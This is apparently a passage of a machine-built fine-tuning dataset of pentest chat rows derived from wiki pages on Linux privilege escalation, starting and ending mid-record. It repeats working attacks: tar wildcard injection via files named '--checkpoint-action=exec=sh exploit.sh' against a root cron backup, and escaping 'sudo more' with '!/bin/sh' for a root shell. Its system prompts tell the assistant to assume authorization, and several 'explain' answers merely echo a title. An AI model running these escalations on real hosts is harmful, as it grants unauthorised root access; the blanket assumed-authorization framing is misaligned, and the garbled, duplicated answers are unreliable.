in our exploit, we jut need to create these two files in our directory, as well as the exploit.sh file, containing the c"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob", "response": "Imagine a scenario where a script backups a directory (that we can control) on the server each hour using tar like this :\n\n``\n#!/bin/bash\n\nmkdir -p /backups/\ncd /var/www/html/ && tar cvzf /backups/backup_$(date +%Y_%m_%d_%Hh%M).tar.gz *\n`\n\nNotice this interesting pattern tar czvf file.tar.gz * in the script. This is a security vulnerability because of how UNIX shells handles wildcards. Let's see an example with the ls command :\n\n`\n$ ls -lha\ntotal 84K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n$ ls *\nfile1 file2 file3\n\n$ echo '' > '-lha'\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n-rw-rw-r-- 1 user user 1 avril 27 22:32 -lha\n$ ls *\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n`\n\nThe shell wildcards are resolved by the shell, and not by the command. This means filenames can be treated as options if they are starting with a -. In our previous example, we added a file called -lha into the folder. When we type ls , the shell replaces the by all matching files in the current directory, and therefore our command becomes ls file1 file2 file3 -lha. After the wildcard resolution, the shell executes the command with our options.\n\nNow if we get back to our script creating a backup of a directory each our with tar *, we see that tar have legitimate options allowing execution of a program. You can find them here :\n\n* https://gtfobins.github.io/gtfobins/tar/#shell\n\nTo use these options in our exploit, we jut need to create these two files in our directory, as well as the exploit.sh file, containing the c", "metadata": {"corpus_index": 1419, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the bash syntax for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob?"}, {"role": "assistant", "content": "#!/bin/bash\n\nmkdir -p /backups/\ncd /var/www/html/ && tar cvzf /backups/backup_$(date +%Y_%m_%d_%Hh%M).tar.gz *"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the bash syntax for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob?", "response": "#!/bin/bash\n\nmkdir -p /backups/\ncd /var/www/html/ && tar cvzf /backups/backup_$(date +%Y_%m_%d_%Hh%M).tar.gz *", "metadata": {"corpus_index": 1420, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "bash"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob"}, {"role": "assistant", "content": "#!/bin/bash\n\nmkdir -p /backups/\ncd /var/www/html/ && tar cvzf /backups/backup_$(date +%Y_%m_%d_%Hh%M).tar.gz *"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob", "response": "#!/bin/bash\n\nmkdir -p /backups/\ncd /var/www/html/ && tar cvzf /backups/backup_$(date +%Y_%m_%d_%Hh%M).tar.gz *", "metadata": {"corpus_index": 1420, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the ls syntax for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob?"}, {"role": "assistant", "content": "$ ls -lha\ntotal 84K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n$ ls *\nfile1 file2 file3\n\n$ echo '' > '-lha'\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n-rw-rw-r-- 1 user user 1 avril 27 22:32 -lha\n$ ls *\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the ls syntax for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob?", "response": "$ ls -lha\ntotal 84K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n$ ls *\nfile1 file2 file3\n\n$ echo '' > '-lha'\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n-rw-rw-r-- 1 user user 1 avril 27 22:32 -lha\n$ ls *\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3", "metadata": {"corpus_index": 1421, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ls"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob"}, {"role": "assistant", "content": "$ ls -lha\ntotal 84K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n$ ls *\nfile1 file2 file3\n\n$ echo '' > '-lha'\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n-rw-rw-r-- 1 user user 1 avril 27 22:32 -lha\n$ ls *\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob", "response": "$ ls -lha\ntotal 84K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n$ ls *\nfile1 file2 file3\n\n$ echo '' > '-lha'\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3\n-rw-rw-r-- 1 user user 1 avril 27 22:32 -lha\n$ ls *\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file3", "metadata": {"corpus_index": 1421, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `$ ls -lha`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob. Case study 1 : Privesc using tar and a cronjob"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `$ ls -lha`?", "response": "This command is used for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob. Case study 1 : Privesc using tar and a cronjob", "metadata": {"corpus_index": 1421, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the echo command for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob"}, {"role": "assistant", "content": "echo '' > '--checkpoint=1'\necho '' > '--checkpoint-action=exec=sh exploit.sh'\n\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 1 avril 27 22:31 '--checkpoint=1'\n-rw-rw-r-- 1 user user 1 avril 27 22:32 '--checkpoint-action=exec=sh exploit.sh'\n-rwxrwxrwx 1 user user 784 avril 27 22:32 exploit.sh"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the echo command for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob", "response": "echo '' > '--checkpoint=1'\necho '' > '--checkpoint-action=exec=sh exploit.sh'\n\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 1 avril 27 22:31 '--checkpoint=1'\n-rw-rw-r-- 1 user user 1 avril 27 22:32 '--checkpoint-action=exec=sh exploit.sh'\n-rwxrwxrwx 1 user user 784 avril 27 22:32 exploit.sh", "metadata": {"corpus_index": 1422, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "echo"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob?"}, {"role": "assistant", "content": "echo '' > '--checkpoint=1'\necho '' > '--checkpoint-action=exec=sh exploit.sh'\n\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 1 avril 27 22:31 '--checkpoint=1'\n-rw-rw-r-- 1 user user 1 avril 27 22:32 '--checkpoint-action=exec=sh exploit.sh'\n-rwxrwxrwx 1 user user 784 avril 27 22:32 exploit.sh"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for 🛠️ Living off the land - Case study 1 : Privesc using tar and a cronjob?", "response": "echo '' > '--checkpoint=1'\necho '' > '--checkpoint-action=exec=sh exploit.sh'\n\n$ ls -lha \ntotal 88K\ndrwxrwxr-x 2 user user 4,0K avril 27 22:32 .\ndrwxrwxrwt 89 user user 76K avril 27 22:31 ..\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file1\n-rw-rw-r-- 1 user user 0 avril 27 22:31 file2\n-rw-rw-r-- 1 user user 1 avril 27 22:31 '--checkpoint=1'\n-rw-rw-r-- 1 user user 1 avril 27 22:32 '--checkpoint-action=exec=sh exploit.sh'\n-rwxrwxrwx 1 user user 784 avril 27 22:32 exploit.sh", "metadata": {"corpus_index": 1422, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `echo '' > '--checkpoint=1'`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob. Case study 1 : Privesc using tar and a cronjob"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `echo '' > '--checkpoint=1'`?", "response": "This command is used for 🛠️ living off the land - case study 1 : privesc using tar and a cronjob. Case study 1 : Privesc using tar and a cronjob", "metadata": {"corpus_index": 1422, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ Living off the land - Case study 2 : Privesc using more and sudo in the context of penetration testing"}, {"role": "assistant", "content": "Let's take an example, with this sudo configuration :\n\n``\n$ sudo -l\n[sudo] password for user: \nMatching Defaults entries for user on PC1:\n env_reset, mail_badpass,\n secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser user may run the following commands on PC1:\n (ALL : NOPASSWD) /usr/bin/more /var/log/apache2/access.log\n`\n\nIn this case user can run the more command, but only to read a specific log file /var/log/apache2/access.log as root without password (NOPASSWD flag) : \n\n`\nsudo -u root /usr/bin/more /var/log/apache2/access.log\n`\n\nYou can assume this would be safe right ? Unfortunately, it's not. The more command has various useful options, one of them is !. When you're in more and you type an exclamation mark followed by the path to a binary file, you can execute it in a subprocess. For example if you type !/bin/sh in more, you will open a shell as the owner of the parent more process !\n\n``\n$ sudo -u root /usr/bin/more /var/log/apache2/access.log\nFile content line 1\nFile content line 2\n...\nFile content line n\n------------------------\n!/bin/sh"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🛠️ Living off the land - Case study 2 : Privesc using more and sudo in the context of penetration testing", "response": "Let's take an example, with this sudo configuration :\n\n``\n$ sudo -l\n[sudo] password for user: \nMatching Defaults entries for user on PC1:\n env_reset, mail_badpass,\n secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser user may run the following commands on PC1:\n (ALL : NOPASSWD) /usr/bin/more /var/log/apache2/access.log\n`\n\nIn this case user can run the more command, but only to read a specific log file /var/log/apache2/access.log as root without password (NOPASSWD flag) : \n\n`\nsudo -u root /usr/bin/more /var/log/apache2/access.log\n`\n\nYou can assume this would be safe right ? Unfortunately, it's not. The more command has various useful options, one of them is !. When you're in more and you type an exclamation mark followed by the path to a binary file, you can execute it in a subprocess. For example if you type !/bin/sh in more, you will open a shell as the owner of the parent more process !\n\n``\n$ sudo -u root /usr/bin/more /var/log/apache2/access.log\nFile content line 1\nFile content line 2\n...\nFile content line n\n------------------------\n!/bin/sh", "metadata": {"corpus_index": 1423, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Living off the land - Case study 2 : Privesc using more and sudo?"}, {"role": "assistant", "content": "Let's take an example, with this sudo configuration :\n\n``\n$ sudo -l\n[sudo] password for user: \nMatching Defaults entries for user on PC1:\n env_reset, mail_badpass,\n secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser user may run the following commands on PC1:\n (ALL : NOPASSWD) /usr/bin/more /var/log/apache2/access.log\n`\n\nIn this case user can run the more command, but only to read a specific log file /var/log/apache2/access.log as root without password (NOPASSWD flag) : \n\n`\nsudo -u root /usr/bin/more /var/log/apache2/access.log\n`\n\nYou can assume this would be safe right ? Unfortunately, it's not. The more command has various useful options, one of them is !. When you're in more and you type an exclamation mark followed by the path to a binary file, you can execute it in a subprocess. For example if you type !/bin/sh in more, you will open a shell as the owner of the parent more process !\n\n``\n$ sudo -u root /usr/bin/more /var/log/apache2/access.log\nFile content line 1\nFile content line 2\n...\nFile content line n\n------------------------\n!/bin/sh"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Living off the land - Case study 2 : Privesc using more and sudo?", "response": "Let's take an example, with this sudo configuration :\n\n``\n$ sudo -l\n[sudo] password for user: \nMatching Defaults entries for user on PC1:\n env_reset, mail_badpass,\n secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser user may run the following commands on PC1:\n (ALL : NOPASSWD) /usr/bin/more /var/log/apache2/access.log\n`\n\nIn this case user can run the more command, but only to read a specific log file /var/log/apache2/access.log as root without password (NOPASSWD flag) : \n\n`\nsudo -u root /usr/bin/more /var/log/apache2/access.log\n`\n\nYou can assume this would be safe right ? Unfortunately, it's not. The more command has various useful options, one of them is !. When you're in more and you type an exclamation mark followed by the path to a binary file, you can execute it in a subprocess. For example if you type !/bin/sh in more, you will open a shell as the owner of the parent more process !\n\n``\n$ sudo -u root /usr/bin/more /var/log/apache2/access.log\nFile content line 1\nFile content line 2\n...\nFile content line n\n------------------------\n!/bin/sh", "metadata": {"corpus_index": 1423, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Living off the land - Case study 2 : Privesc using more and sudo during a pentest?"}, {"role": "assistant", "content": "$ sudo -l\n[sudo] password for user: \nMatching Defaults entries for user on PC1:\n env_reset, mail_badpass,\n secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser user may run the following commands on PC1:\n (ALL : NOPASSWD) /usr/bin/more /var/log/apache2/access.log"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Living off the land - Case study 2 : Privesc using more and sudo during a pentest?", "response": "$ sudo -l\n[sudo] password for user: \nMatching Defaults entries for user on PC1:\n env_reset, mail_badpass,\n secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser user may run the following commands on PC1:\n (ALL : NOPASSWD) /usr/bin/more /var/log/apache2/access.log", "metadata": {"corpus_index": 1424, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `$ sudo -l`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - case study 2 : privesc using more and sudo. Case study 2 : Privesc using more and sudo"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `$ sudo -l`?", "response": "This command is used for 🛠️ living off the land - case study 2 : privesc using more and sudo. Case study 2 : Privesc using more and sudo", "metadata": {"corpus_index": 1424, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Living off the land - Case study 2 : Privesc using more and sudo?"}, {"role": "assistant", "content": "sudo -u root /usr/bin/more /var/log/apache2/access.log"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Living off the land - Case study 2 : Privesc using more and sudo?", "response": "sudo -u root /usr/bin/more /var/log/apache2/access.log", "metadata": {"corpus_index": 1425, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sudo -u root /usr/bin/more /var/log/apache2/access.log`?"}, {"role": "assistant", "content": "This command is used for 🛠️ living off the land - case study 2 : privesc using more and sudo. Case study 2 : Privesc using more and sudo"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sudo -u root /usr/bin/more /var/log/apache2/access.log`?", "response": "This command is used for 🛠️ living off the land - case study 2 : privesc using more and sudo. Case study 2 : Privesc using more and sudo", "metadata": {"corpus_index": 1425, "category": "linux", "source_file": "docs/src/infra/privilege-escalation/unix/living-off-the-land.md", "page_title": "🛠️ Living off the land", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about SUDO - Theory"}, {"role": "assistant", "content": "sudo (Super User DO) is a program for UNIX-like computer operating systems that allows users to run programs with the security privileges of another user (by default, the superuser).\n\nUnlike the similar command su, users must, by default, supply their own password for authentication, rather than the password of the target user. After authentication, and if the configuration file, which is typically located at /etc/sudoers, permits the user access, the system invokes the requested command with the target user's privileges.\n\nSudo users are called sudoers ( 😯 _I know right, big brains here_ 🧠 ). What sudoers are allowed to do is defined in the /etc/sudoers configuration file. This file, owned by root, is supposed to be 440 (read-only) and should only be edited with visudo, sudoedit or sudo -e.\n\n![](./assets/sudoers_config.png)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about SUDO - Theory", "response": "sudo (Super User DO) is a program for UNIX-like computer operating systems that allows users to run programs with the security privileges of another user (by default, the superuser).\n\nUnlike the similar command su, users must, by default, supply their own password for authentication, rather than the password of the target user. After authentication, and if the configuration file, which is typically located at /etc/sudoers, permits the user access, the system invokes the requested command with the target user's privileges.\n\nSudo users are called sudoers ( 😯 _I know right, big brains here_ 🧠 ). What sudoers are allowed to do is defined in the /etc/sudoers configuration file. This file, owned by root, is supposed to be 440 (read-only) and should only be edited with visudo, sudoedit or sudo -e.\n\n![](./assets/sudoers_config.png)", "metadata": {"corpus_index": 1426, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SUDO - Theory"}, {"role": "assistant", "content": "sudo (Super User DO) is a program for UNIX-like computer operating systems that allows users to run programs with the security privileges of another user (by default, the superuser).\n\nUnlike the similar command su, users must, by default, supply their own password for authentication, rather than the password of the target user. After authentication, and if the configuration file, which is typically located at /etc/sudoers, permits the user access, the system invokes the requested command with the target user's privileges.\n\nSudo users are called sudoers ( 😯 _I know right, big brains here_ 🧠 ). What sudoers are allowed to do is defined in the /etc/sudoers configuration file. This file, owned by root, is supposed to be 440 (read-only) and should only be edited with visudo, sudoedit or sudo -e.\n\n![](./assets/sudoers_config.png)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SUDO - Theory", "response": "sudo (Super User DO) is a program for UNIX-like computer operating systems that allows users to run programs with the security privileges of another user (by default, the superuser).\n\nUnlike the similar command su, users must, by default, supply their own password for authentication, rather than the password of the target user. After authentication, and if the configuration file, which is typically located at /etc/sudoers, permits the user access, the system invokes the requested command with the target user's privileges.\n\nSudo users are called sudoers ( 😯 _I know right, big brains here_ 🧠 ). What sudoers are allowed to do is defined in the /etc/sudoers configuration file. This file, owned by root, is supposed to be 440 (read-only) and should only be edited with visudo, sudoedit or sudo -e.\n\n![](./assets/sudoers_config.png)", "metadata": {"corpus_index": 1426, "category": "privilege_escalation", "source_file": "docs/src/infra/privilege-escalation/unix/sudo.md", "page_title": "SUDO", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of SUDO - Practice"}, {"role": "assistant", "content": "There are many ways to escalate privileges by exploiting sudo, either by profiting from insecure configuration, or by exploiting the program's vulnerabilities."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of SUDO - Practice", "response": "There are many ways to escalate privileges by exploiting sudo, either by profiting from insecure configuration, or by exploiting the program's vulnerabilities.", "metadata": {"corpus_index": 1427, "category": 